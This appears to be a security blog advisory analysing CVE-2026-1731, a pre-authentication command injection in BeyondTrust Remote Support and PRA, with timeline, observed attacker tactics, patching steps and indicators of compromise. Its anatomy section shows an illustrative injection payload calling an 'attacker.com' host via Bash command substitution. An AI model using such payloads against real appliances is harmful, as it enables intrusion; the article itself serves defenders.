CVE-2026-1731: Critical Pre-Auth RCE in BeyondTrust Remote Support and PRA

On February 6, 2026, BeyondTrust published an emergency security advisory (BT26-02) for CVE-2026-1731, a critical OS command injection vulnerability in its Remote Support and Privileged Remote Access (PRA) products. CVSS score: 9.9 out of 10. No authentication required. Trivial to exploit. And most importantly: a public proof-of-concept available since February 10, with attacks confirmed in the wild less than 24 hours after its release.

What makes this CVE particularly interesting beyond its technical severity is how it was discovered: it was identified on January 31, 2026 by Harsh Jaiswal and the Hacktron AI team through AI-assisted variant analysis. AI is no longer content with generating code or drafting reports: it now finds zero-days in critical enterprise software.

Here is a full breakdown of this flaw, its timeline, its exploitation in the wild, and the measures to take immediately if you operate BeyondTrust instances.

BeyondTrust: a major player in secure remote access

For those unfamiliar with the vendor, BeyondTrust provides privileged remote access solutions used by more than 20,000 organizations across over 100 countries, including 75% of the Fortune 100. Two products are at the heart of this issue:

• Remote Support (RS): lets technical support teams take remote control of workstations and servers to assist users or intervene on infrastructure
• Privileged Remote Access (PRA): provides secure remote access to critical systems for administrators and external contractors, with session recording and privilege management

These appliances, historically known as Bomgar, are deployed either as SaaS or on-premises (the well-known B-series appliances). It is this second deployment mode that causes the most problems: roughly 8,500 on-premises instances are directly exposed on the Internet, and many run on end-of-life hardware that complicates updates.

The historical context adds to the urgency. In late 2024, the Chinese group Silk Typhoon exploited two BeyondTrust flaws (CVE-2024-12356 and CVE-2024-12686) to compromise the U.S. Department of the Treasury. CVE-2026-1731 hits exactly the same type of attack surface.

Anatomy of the vulnerability

Classification and attack vector

CVE-2026-1731 is classified as an OS command injection (CWE-78: Improper Neutralization of Special Elements used in an OS Command). The attacker sends specially crafted requests to the BeyondTrust appliance, without any prior authentication, and gains execution of system commands in the context of the service user.

The CVSS characteristics speak for themselves:

CVE-2026-1731
CVSSv4 score  : 9.9 / 10 (Critical)
Type          : OS Command Injection (CWE-78)
Vector        : Network (AV:N)
Complexity    : Low (AC:L)
Privileges    : None (PR:N)
Interaction   : None (UI:N)
Impact        : Confidentiality, Integrity, Availability (CIA) = High

In plain terms: anyone on the Internet can send an HTTP request to a vulnerable BeyondTrust instance and execute system commands. No password, no user interaction, low exploitation complexity.

The vulnerable endpoint: get_portal_info

The flaw lies in the get_portal_info endpoint, accessible via WebSocket on the /nw path. It is the same endpoint that was exploited in CVE-2024-12356, the one used by Silk Typhoon against the U.S. Treasury. The root cause is an unsafe Bash arithmetic evaluation in a script accessible via WebSocket.

Concretely, parameters supplied by the user in the WebSocket request are passed without sufficient sanitization to a Bash evaluation. An attacker can inject arbitrary commands through constructs like:

# Conceptual example of injection via Bash arithmetic evaluation
# User input is passed to a $(( )) expression
# The attacker injects through Bash $() syntax

# Vulnerable arithmetic evaluation (pseudocode)
result=$(( ${user_input} ))

# Injection payload:
# user_input = "1$(curl http://attacker.com/callback)"
# Bash first resolves the $() command substitution
# then attempts the arithmetic evaluation

# The server executes:
result=$(( 1$(curl http://attacker.com/callback) ))
# → curl runs with the privileges of the BeyondTrust process

The subtlety of this class of vulnerability is that Bash arithmetic evaluation ($(( ))) resolves command substitutions ($()) before computing the result. A developer who thinks they are only handling numbers ends up executing system commands.

Affected versions and fixes

The impacted versions and available fixes:

Product                    Vulnerable versions     Fixed version
─────────────────────────  ─────────────────────   ─────────────────
Remote Support (RS)        ≤ 25.3.1                25.3.2 (patch BT26-02-RS)
Privileged Remote Access   ≤ 24.3.4                25.1.1 (patch BT26-02-PRA)

Important note: PRA versions 25.1 and above are not affected. The problem mainly concerns on-premises deployments that have not been updated for several months, which is unfortunately common with hardware appliances.

Discovery by AI: a turning point for vulnerability research

The most remarkable aspect of this CVE is how it was discovered. On January 31, 2026, Harsh Jaiswal (co-founder of Hacktron AI) and Mohan Sri Rama Krishna Pedhapati identified the flaw using an AI-assisted variant analysis technique.

The principle of variant analysis is well known in security: when a vulnerability is discovered in a software component, you look for similar patterns in the same codebase or in other products. Historically, this is manual, methodical, and time-consuming work. The innovation here is the AI automation of this process.

Hacktron AI describes its approach as autonomous scans designed to discover classes of vulnerabilities and their variants at scale across enterprise software. Starting from CVE-2024-12356 (the flaw exploited by Silk Typhoon), their system identified that the same injection pattern existed in an unpatched variant of the same endpoint.

The implications are considerable:

• Faster discovery: what used to take weeks of manual auditing can be done in hours by an automated system
• Systematic coverage: AI can test thousands of payload variations across every accessible endpoint, where a human researcher would focus on the most likely ones
• Large-scale variant analysis: a single known CVE can serve as a starting point to discover dozens of similar flaws in related products
• Dual-use risk: if AI lets legitimate researchers find flaws faster, it offers the same advantage to attackers

This is a strong signal for the industry. AI agent security is already a hot topic, but here it is AI as both an offensive and defensive vulnerability research tool that takes on a concrete dimension. We move from theory to proof by CVE.

Full incident timeline

The timeline of this CVE is a textbook case of how quickly a critical vulnerability goes from discovery to mass exploitation:

Date                 Event
──────────────────   ──────────────────────────────────────────────────
January 31, 2026     Discovered by Harsh Jaiswal / Hacktron AI
                     via AI-assisted variant analysis

February 2, 2026     BeyondTrust automatically patches all
                     SaaS (cloud) instances

February 6, 2026     Publication of security advisory BT26-02
                     CVE-2026-1731 assigned

February 9, 2026     Rapid7 publishes a detailed technical analysis
                     ~11,000 exposed instances identified

February 10, 2026    Proof-of-concept published on GitHub
                     First exploitation attempts observed

February 11, 2026    GreyNoise detects mass reconnaissance
                     86% of scans originate from a single IP

February 12, 2026    Rapid7 publishes a full PoC
                     Two distinct exploitation tools identified

February 13, 2026    Active exploitation confirmed by Arctic Wolf
                     CISA adds the CVE to the KEV catalog
                     SimpleHelp RMM deployed on targets

February 16, 2026    Widespread exploitation underway

Less than 10 days between the patch release and active exploitation in the wild. Less than 24 hours between the PoC release and the first attacks. This is the standard tempo of critical CVEs in 2026: the grace period to patch no longer exists.

Exploitation in the wild: what attackers are doing

Mass and targeted reconnaissance

GreyNoise documented the reconnaissance phase with remarkable precision. The key observations:

• A dominant actor: a single IP address accounts for 86% of scan sessions, operating from a commercial VPN based in Frankfurt and active since 2023
• Non-standard port targeting: the attackers do not just scan port 443. They systematically test clusters of non-standard ports, knowing that companies often move BeyondTrust onto custom ports
• Technical fingerprint: JA4+ analysis reveals an MSS of 1358 (instead of the standard 1460), confirming VPN encapsulation. 100% of sessions show Linux stack characteristics
• Two distinct exploitation tools: a lightweight 5-header HTTP variant shared between the main IPs, and a 7-header variant used by 10 single-session scanners

Critical point: these actors are not novice opportunists. Their GreyNoise profiles show that they simultaneously target SonicWall, MOVEit Transfer, Log4j, Sophos firewalls, and conduct SSH brute-force and default IoT credential testing. This is a large-scale compromise operation.

Post-exploitation: from RCE to domain control

Arctic Wolf documented the post-exploitation tactics observed on compromised instances. The attack pattern is methodical:

Phase 1: Initial exploitation
→ Command injection via get_portal_info (WebSocket /nw)
→ Execution in the context of the SYSTEM account

Phase 2: Persistence
→ Deployment of SimpleHelp RMM (legitimate remote management tool)
→ Renamed binaries (e.g., "remote access.exe") in ProgramData
→ Execution via Bomgar processes under the SYSTEM account

Phase 3: Lateral movement
→ Creation of domain accounts via "net user"
→ Addition to "Enterprise Admins" and "Domain Admins" groups
→ Active Directory scan via AdsiSearcher
→ Deployment of SimpleHelp on other machines via PsExec
→ Impacket SMBv2 requests across compromised environments

Phase 4: Final objective
→ Full control of the Active Directory domain
→ Ideal position for ransomware deployment

The choice of SimpleHelp as a persistence tool is tactically smart: it is legitimate remote management software, less likely to trigger antivirus alerts than a classic reverse shell.

Checking and remediating your instances

Identify vulnerable instances

The first step is to determine whether you operate BeyondTrust instances and which version they are running:

# 1. Scan your network to find BeyondTrust instances
# BeyondTrust usually exposes an identifiable web portal
nmap -sV -p 443,8443,4430 --script http-title your-network/24

# 2. Check the version via the admin interface
# Log in to https://your-instance/login
# Menu: Configuration → About
# Or via the API (if accessible):
curl -sk https://your-instance/api/v1/version

# 3. Check exposure from the Internet
# Use Shodan or Censys to identify your assets
# Shodan search: "BeyondTrust" or "Bomgar"
# Censys identified ~190,832 exposed web properties

# 4. Check logs for exploitation attempts
# Look for suspicious patterns in the BeyondTrust logs
grep -rE "get_portal_info|/nw.*WebSocket" /var/log/beyondtrust/
# Look for abnormal WebSocket connections
grep -i "websocket" /var/log/nginx/access.log | grep "/nw"

Apply the fix

For on-premises instances, the patch is applied via the appliance admin interface:

# BeyondTrust on-premises update procedure
# ================================================

1. Access the /appliance interface of your instance
   https://your-instance/appliance

2. "Updates" section → Check for available updates

3. Apply the BT26-02-RS patch (Remote Support)
   or BT26-02-PRA (Privileged Remote Access)

4. Reboot the appliance after applying the patch

5. Verify that the version is:
   - Remote Support ≥ 25.3.2
   - PRA ≥ 25.1.1

# WARNING: legacy appliances
# RS < 21.3 and PRA < 22.1 versions require
# a sequential update BEFORE you can
# apply the BT26-02 patch.
# Contact BeyondTrust support for assistance.

Immediate mitigation measures

While waiting for patching, or if you cannot update immediately:

# 1. Restrict network access to the BeyondTrust appliance
# Limit to trusted IPs only
# Example with iptables:
iptables -A INPUT -p tcp --dport 443 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

# 2. Block WebSocket connections to /nw if not used
# Nginx reverse proxy configuration:
# location /nw {
#     deny all;
#     return 403;
# }

# 3. Monitor for indicators of compromise
# Look for suspicious processes
ps aux | grep -iE "simplehelp|remote.access|bomgar"

# Check for recently created AD accounts
# PowerShell:
# Get-ADUser -Filter {Created -gt "2026-02-10"} -Properties Created

# Check for additions to administrator groups
# Get-ADGroupMember "Domain Admins" | Select Name, SID

# 4. Enable detailed logging
# In the BeyondTrust interface:
# Configuration → Security → Enable detailed logging

To strengthen the security of your remote access more generally, the article Securing SSH: best practices covers the fundamentals of securing remote access, applicable well beyond the SSH protocol alone.

Indicators of compromise

If your BeyondTrust instances were exposed before patching, actively search for these indicators:

Network indicators:
─────────────────────────────────────────────────────────
• Abnormal WebSocket connections to /nw (port 443)
• Callbacks to OAST domains (out-of-band testing)
• MSS of 1358 in TCP connections (VPN signature)
• Impacket SMBv2 requests between internal machines

System indicators:
─────────────────────────────────────────────────────────
• Renamed SimpleHelp binaries in C:ProgramData
• "remote access.exe" processes launched via Bomgar/SYSTEM
• User accounts created after February 10, 2026
• Additions to "Domain Admins" / "Enterprise Admins" groups
• PsExec executions toward domain machines

Reconnaissance indicators (GreyNoise):
─────────────────────────────────────────────────────────
• Scans on non-standard ports (not just 443)
• User-Agents with 5 or 7 specific HTTP headers
• Combined BeyondTrust + SonicWall + MOVEit scans

Lessons and outlook

The recurrence of BeyondTrust flaws

This is the third major critical flaw in BeyondTrust products in less than 14 months. After CVE-2024-12356 and CVE-2024-12686 exploited by Silk Typhoon, CVE-2026-1731 hits the same endpoint (get_portal_info) with the same type of vulnerability. This raises legitimate questions about the vendor's code review and internal security processes.

For organizations that depend on BeyondTrust, this is a wake-up call: these appliances must be treated as priority targets for attackers and secured accordingly, regardless of the trust placed in the vendor.

AI accelerates both sides

The discovery of this CVE through AI-assisted variant analysis illustrates a paradigm shift in vulnerability research. Automated tools make it possible to cover an incomparably larger analysis surface than a manual audit. But this capability is available to everyone, legitimate researchers and attackers alike.

The window between a patch release and active exploitation shrinks with every new critical CVE. In 2024, we talked about a few weeks. In 2026, it is less than 24 hours after a PoC is released. Security teams that rely on a monthly patching cycle are structurally behind.

Network appliances remain the weak link

BeyondTrust, SonicWall, Fortinet, Ivanti, Palo Alto: the list of network appliance vendors hit by critical flaws keeps growing. These devices combine all the risk factors:

• Direct Internet exposure by design
• Elevated privileges over the infrastructure they protect
• Slow update cycles (hardware appliances, availability constraints)
• Unanticipated end of life for older hardware models
• Limited visibility into what actually runs on the appliance

The Zero Trust model makes full sense here: never trust a network device as your sole layer of security, even when it is itself supposed to be a security tool.

Conclusion

CVE-2026-1731 alone concentrates several of the underlying trends in cybersecurity in 2026: critical network appliances as a primary attack vector, an exploitation window shrinking to a few hours, and the emergence of AI as an accelerator of vulnerability research, for better and for worse.

The key takeaways:

• Patch immediately all on-premises BeyondTrust RS and PRA instances to versions 25.3.2 (RS) and 25.1.1 (PRA)
• Check for indicators of compromise if your instances were exposed before the fix, in particular the presence of SimpleHelp RMM and recently created AD accounts
• Isolate BeyondTrust appliances behind strict network access controls and do not expose them directly on the Internet without filtering
• Plan the migration of end-of-life Bomgar B-series appliances that can no longer receive security fixes
• Actively monitor upcoming BeyondTrust CVE releases, the same endpoint having been compromised three times in 14 months

And more broadly, this CVE is a reminder of an uncomfortable reality: the tools meant to secure remote access have themselves become one of the most targeted attack surfaces. Security cannot be delegated to an appliance. It is built in depth, verified continuously, and updated in hours, not weeks.